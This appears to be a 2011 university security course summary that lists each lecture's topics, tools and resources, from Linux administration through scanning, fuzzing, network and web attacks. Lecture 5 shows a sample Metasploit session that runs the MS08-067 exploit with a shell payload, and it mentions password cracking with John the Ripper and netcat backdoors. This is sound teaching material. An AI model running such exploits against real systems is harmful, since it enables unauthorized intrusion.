Summary of CS4238 Lectures

Lecture 1 (15/08/2011)

Lecture topic: Module Overview, and administrative information

Lecture 2 (22/08/2011)

Lecture topic: Linux overview and system administration

Skills and tools:

Installation of Ubuntu Linux
Understanding common Linux file system structure

/etc, /etc/passwd, /etc/shadow
/bin, /sbin, /usr/bin, /usr/sbin, /usr/local/bin
/dev, /boot, /proc,
/tmp, /var, /var/log

Interface to the on-line reference manuals: man

Example: man man, man ls, man -k password, man 1 write, man 2 write

Editor: vi, pico, gedit
Process control: &, ps, kill, fg, bg
File system commands: ls, cd, pwd, rm, mkdir, rmdir
File system access control: chmod, chown, chgrp

Understanding the UNIX access control string (rwxrwxrwx) and numerical encoding
Understanding special permissions, such as set-uid
Example: chmod u+x myfile, chmod 4755 myexecutable

Lecture 3 (29/08/2011)

Lecture topic: Reconnaissance and Scanning

Milestones: Form project team, finish setting up Linux on the external USB drive

Skills and tools:

Google Hacking, searching with directives and search operators
Whois database: whois

Example: whois nus.edu.sg

DNS query: nslookup, dig
Configure a network interface or find our system IP address: ifconfig

Example: ifconfig, ifconfig eth0, ifconfig eth0 192.168.0.125 netmask 255.255.255.0

Network mapping: ping, traceroute

Example: ping 192.168.0.1, ping ivle.nus.edu.sg, traceroute www.google.com
GUI-based network mapping tool: Cheops-ng

Port scanning: nmap, zenmap

Try all possible command line options of nmap

Package maintenance: apt-get, apt-cache

Example, search for package nmap: apt-cache search nmap
Installing and removing a package: sudo apt-get install nmap, sudo apt-get remove nmap
GUI-based package manager: sudo synaptic, or start from system menu System->Administration->Synaptic Package Manager

Lecture 4 (05/09/2011)

Lecture topic: Vulnerability-scanning, buffer overflow exploits and analysis

Skills and tools:

Nessus vulnerability scanner: basic configuration and scanning
GDB

Breakpoints: break, delete

Set a breakpoint at function func: break func
Set a breakpoint at a memory address addr: break *addr
Set a breakpoint at a line number N of the current source file: break N
Set a breakpoint at a line number N of the source file F: break F:N
Delete a breakpoint: delete

Executing program and stepping: run, step, stepi, next, nexti

Start debugged program: run
Execute one line in source code: step
Execute one machine instruction: stepi
Execute one line in source code. Do not step into functions: next
Execute one machine instruction. Do not step into functions: nexti

Examining the environment and program states:

Print backtrace of all stack frames: backtrace or bt
List of integer registers and their contents, for selected stack frame: info registers
Print value of expression EXP: print EXP
Examine memory: x /FMT ADDRESS

Examine the memory word at address 0x08048500: x /xw 0x08048500
Examine four bytes at the address pointed by EBP: x /4xb $ebp

Detailed explanation of the format arguments accepted by the command x: http://sourceware.org/gdb/current/onlinedocs/gdb/Memory.html#Memory
How to check and use the value in registers: http://sourceware.org/gdb/current/onlinedocs/gdb/Registers.html#Registers

Resources:

Nessus: http://www.tenable.com/products/nessus
Sample file for understanding function call mechanism and buffer overflow: overflowsample.tar.gz
GDB documentation: http://sourceware.org/gdb/current/onlinedocs/gdb/
A GDB tutorial: http://dirac.org/linux/gdb/index.php

Understanding program memory layout and the stack: http://dirac.org/linux/gdb/02a-Memory_Layout_And_The_Stack.php

Lecture 5 (12/09/2011)

Lecture topic: Buffer overflow attacks, exploit engine, buffer overflow defense, password attacks

Skills and tools:

Using GDB to understand buffer overflow attacks and defense mechanisms
Creating exploits to get root shell
Metasploit framework

Start metasploit framework: msfconsole
Subcommands: use, set RHOST, set PAYLOAD, exploit
An sample session, texts in green are prompts from shell and msfconsole:
$ msfconsole
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.10.2
msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell_bind_tcp
msf exploit(ms08_067_netapi) > exploit

John the Ripper password cracker

unshadow
john

Resources:

Video: Buffer overflow attacks explained with beer! http://www.youtube.com/watch?v=7LDdd90aq5Y
Metasploit framework: http://metasploit.com/
John the Ripper: http://www.openwall.com/john/

Lecture 6 (19/09/2011)

Lecture topic: Linux network administration and firewall

Skills and tools:

Configuring network settings of a host computer

IP address, network mask, gateway, and DNS
Static configuration and DHCP

Configuring network settings of a router

Enabling IP forwarding in Linux

The ifconfig utility
Linux firewall

The Netfilter framework: PREROUTING, FORWARD, POSTROUTING, INPUT, OUTPUT
Path of packets
Firewall rules
The iptables tool

Sharing an IP address by network address translation (NAT)
Creating a virtual network interface and connecting a QEMU virtual machine to the virtual network interface

tunctl, qemu

Resources:

Netfilter: http://www.netfilter.org/
Ubuntu iptables HOWTO: https://help.ubuntu.com/community/IptablesHowTo
Ubuntu document for Internet connection sharing: https://help.ubuntu.com/community/Internet/ConnectionSharing

Lecture 7 (26/09/2011)

Lecture topic: Fuzzing, vulnerability detection, binary analysis

Skills and tools:

The SPIKE fuzzer

Understanding SPIKE scripts
Open-source package configuration

Using GDB to analyze program crashes
(Optional) BitBlaze platform

Using BitBlaze's taint tracking utility to detect buffer overflow exploits

Resources:

The SPIKE fuzzer: http://immunityinc.com/resources-freesoftware.shtml
An introduction to fuzzing: http://resources.infosecinstitute.com/intro-to-fuzzing/
BitBlaze: http://bitblaze.cs.berkeley.edu/

Lecture 8 (03/10/2011)

Lecture topic: Network attacks, sniffing, IP spoofing, session hijacking, and denial-of-service

Skills and tools:

Wireshark
The netwox utility

Packet spoofing, reset connection, session hijacking

Netcat

File transfer, port scanning, connecting to open ports, vulnerability scanning, creating backdoors, and relaying traffic.

Resources:

Netwox: http://ntwox.sourceforge.net/

Lecture 9 (10/10/2011)

Lecture topic: Malware analysis, trojan and backdoor, user-level rootkit, kernel-level rootkit, botnets

Skills and tools:

Analyzing program behavior through system call tracing

The strace utility

Understanding the basic concept of rootkit mechanisms and detection mechanisms

(Optional) Virtual machine introspection using BitBlaze

Lecture 10 (17/10/2011)

Lecture topic: Web session cloning, CSRF attacks, SQL injection, Cross-site scripting, Drive-by download.

Skills and tools:

Configuring Apache server
Intercepting and understanding web requests

TamperData Firefox extension
Paros Proxy

Resources:

Apache web server: http://httpd.apache.org/
TamperData: https://addons.mozilla.org/en-US/firefox/addon/tamper-data/
Paros proxy: http://www.parosproxy.org/

Lecture 11 (24/10/2011)

Lecture topic: Guest lecture on web attacks.

Lecture 12 (31/10/2011)

Lecture topic: Review

Resources:

Whole disk encryption

Cryptsetup
A set of Script I created to use a file as an encrypted disk: cryptdiskfile.tar.gz
FreeOTFE: a tool to open encrypted disks or files on Windows

eCryptfs: Enterprise Cryptographic Filesystem

Lecture 13 (8/11/2011, 9/11/2011)

Lecture topic: Practice session